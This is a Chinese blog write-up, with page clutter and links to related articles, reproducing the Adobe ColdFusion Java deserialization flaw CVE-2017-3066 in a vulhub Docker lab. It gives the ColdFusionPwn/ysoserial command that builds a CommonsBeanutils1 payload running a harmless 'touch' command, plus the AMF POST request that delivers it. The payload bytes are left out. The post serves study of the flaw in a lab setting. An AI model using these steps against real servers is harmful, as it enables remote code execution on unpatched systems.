Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

最新推荐文章于 2024-05-15 00:03:12 发布
最新推荐文章于 2024-05-15 00:03:12 发布
阅读量798 收藏 1
点赞数
分类专栏: 中间件漏洞复现 文章标签: adobe 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414319
版权

声明

好好学习,天天向上

漏洞描述

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。

影响范围

Adobe ColdFusion (2016 release) Update 3及之前的版本

ColdFusion 11 Update 11及之前的版本

ColdFusion 10 Update 22及之前的版本

复现过程

这里使用11u3版本

使用vulhub

/app/vulhub-master/coldfusion/CVE-2017-3066

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8500/CFIDE/administrator/index.cfm

输入密码vulhub,即可成功安装Adobe ColdFusion。

工具

https://github.com/codewhitesec/ColdFusionPwn/releases

工具放到kali下,yso也一并拿来,生成payload

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-30099844c6-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/cve-2017-3066' poc.ser

在这里插入图片描述

抓包,发送如下数据包

POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

注意payload的内容直接打开文件复制粘贴是不行的,得在burp中右键上传

在这里插入图片描述

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2017-3066(Adobe ColdFusion 序列漏洞)
G_Fu_Q的博客
04-08 1327
本文仅做漏洞复现记录与实现,请勿用于非法用途 漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Adobe ColdFusion中存在java序列漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 以下版本受
利用Vulnhub复现漏洞 - Adobe ColdFusion 序列漏洞CVE-2017-3066)
JiangBuLiu的博客
06-28 4979
Adobe ColdFusion 序列漏洞CVE-2017-3066)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC500错误 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的C...
【vulhub】Adobe ColdFusion 序列漏洞CVE-2017-3066)和CVE-2010-2861文件包含漏洞
qq_45300786的博客
09-13 285
adobe coldfusion特征 1、8500端口 2、如图所示 验证和弹shell都有 https://idc.wanyunshuju.com/aqld/2076.html
10 - vulhub - Adobe ColdFusion 序列漏洞 (CVE-2024-3066)(2)
最新发布
m0_58269070的博客
05-15 575
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
10 - vulhub - Adobe ColdFusion 序列漏洞 (CVE-2017-3066)
易编橙 · 终身成长社群,相遇已是上上签!
10-20 3665
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Vulhub-coldfusion--CVE-2017-3066
Ronin_qianmo的博客
07-29 443
1、漏洞描述 Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。 攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。 2、启动靶场 3、访问网址 http://x.x
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
ColdFusion 10.x 11.x XSS -> RCE PoC 漏洞利用 此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,...
ColdFusionPwn.jar
01-08
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup ...此工具可以Adobe ColdFusion漏洞利用,例如(CVE-2017-3066) 阅读建议:此资源开发以java为基础,生成所需要的poc。
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
Adobe ColdFusion
05-13
Adobe ColdFusion ColdFusion初級教程繁體中文
coldfusion:树莓派RFID门禁系统-开源
07-04
ColdFusion ========== ColdFusion 是一个树莓派 RFID 门禁系统。 它使用 [wiringPi](http://wiringpi.com/) 来控制 Piface 切换门内的电子锁。 然后它将扫描器给出的 UID 与数据目录中的 UID 进行比较,如果找到...
ColdFusion_Study.rar_ColdFusion stu_adobe coldfusion_coldfusion_
07-14
ColdFusion既是WEB服务器,也是一种WEB脚本语言,基于JAVA,非常...起源很早,大概1994年,原为一小公司产品,后为MacroMedia收购,现在Adobe。国内应用不多,国外好多企业都用的Coldfusion。如赛门铁克、ESRI等等。
Adobe ColdFusion 序列漏洞靶场复现(CVE-2017-3066)
qq_43232893的博客
04-12 833
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 墨者学院之Adobe ColdFusion 序列漏洞靶场复现(CVE-2017-3066)简介一、漏洞复现开启环境CVE-2017-3066漏洞复现 简介 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java序列漏洞。攻击者可利用该漏洞在受影响应用程
dobe ColdFusion AMF 序列远程命令执行 (CVE-2017-3066)
zzzzz1284的博客
01-04 269
CVE-2017-3066
POC - Adobe ColdFusion 序列漏洞CVE-2017-3066)
JiangBuLiu的博客
10-16 1388
安装010Editer 下载链接:http://www.pc6.com/softview/SoftView_55129.html 复制POC的十六进制 00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0A 07 47 6F 72 67 2E 61 70 61 63 68 65 2E 61 78 69 73 32 2E 75 74 69 6C 2E 4D 6...
漏洞分析|Adobe ColdFusion 序列漏洞CVE-2023-29300)
xuandaoren的博客
11-10 1725
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如<string>标签中的元素与属性将由StringHandler处理,<struct>标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变
web 工程课件 西安电子科技大学-软件工程
11-21
* 课程内容:不包括HTML、JavaScript、ActiveX、Flash、PHP、ColdFusion等编程语言的细节,也不包括Web服务器、Servlet引擎设置、人机界面工程等内容 三、评估方式 * 个人表现:出勤、作业、项目、考试等 * 评估...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值